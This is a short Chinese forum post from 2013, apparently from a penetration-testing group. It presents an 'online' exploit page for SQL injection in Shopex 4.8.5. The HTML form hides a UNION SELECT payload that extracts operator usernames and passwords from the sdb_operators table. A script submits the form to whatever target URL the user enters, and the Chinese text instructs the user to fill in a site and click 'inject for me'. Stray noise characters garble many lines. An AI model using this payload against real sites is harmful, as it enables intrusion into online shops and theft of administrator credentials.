<center>
( V* ]) h C6 a% B+ w3 ?<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
) N: ]# J# b+ y! c<form action="" method="post" name="submit_url">
4 ]0 F# M8 p. f6 ?4 M1 Q4 m% |网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
' [+ T* R# p/ G! o<input type="hidden" name="goods[goods_id]" value="3">
7 {3 H, B Z/ q Z% n+ d; Y<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
. @2 j4 C8 F/ V<input type="submit" value="给我注入" onclick=fsubmit()>
3 ?: Y9 U6 m# o</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com T+ [5 U- l2 V8 w: s9 v" P# }
4 V8 G0 {; }- b+ P2 Q
<script> : g0 k: \: V" b8 M" N- B l* x
function fsubmit(){
% Q% r5 \ l/ A& k( ^form = document.forms[0];
9 i4 C* V6 s2 H e" R# dform.action = form.url.value+'/?product-gnotify'; 6 M2 E$ {2 j$ `) d; l
form.submit();
/ R2 P/ S( K U/ m+ w( E} 2 G5 I: v' L" v3 n' p, z5 p
</script>
+ w+ I0 h" f; B* \( W" o, g |
发表于 2013-1-23 09:20:52
收藏
支持
反对